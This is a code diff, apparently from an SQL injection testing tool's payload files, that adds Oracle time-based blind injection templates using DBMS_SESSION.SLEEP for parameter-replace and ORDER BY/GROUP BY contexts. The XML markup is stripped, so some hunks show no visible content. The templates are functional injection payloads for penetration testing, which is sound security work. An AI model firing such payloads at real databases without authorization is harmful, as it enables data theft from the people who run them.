diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml
index fe9de254cc4..1370b8b262e 100644
--- a/data/xml/payloads/time_blind.xml
+++ b/data/xml/payloads/time_blind.xml
@@ -1776,6 +1776,26 @@
+
+
+ Oracle time-based blind - Parameter replace (DBMS_SESSION.SLEEP)
+ 5
+ 3
+ 1
+ 1,3,9
+ 3
+ BEGIN IF ([INFERENCE]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;
+
+ BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;
+
+
+
+
+
+ Oracle
+
+
+
Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)
5
@@ -2072,6 +2092,25 @@
+
+ Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_SESSION.SLEEP)
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(BEGIN IF ([INFERENCE]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;)
+
+ ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;)
+
+
+
+
+
+ Oracle
+
+
+
Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)
5
diff --git a/data/xml/queries.xml b/data/xml/queries.xml
index addf84a4643..f53cf0e1086 100644
--- a/data/xml/queries.xml
+++ b/data/xml/queries.xml
@@ -164,7 +164,7 @@
-
+
@@ -280,8 +280,8 @@
-
-
+
+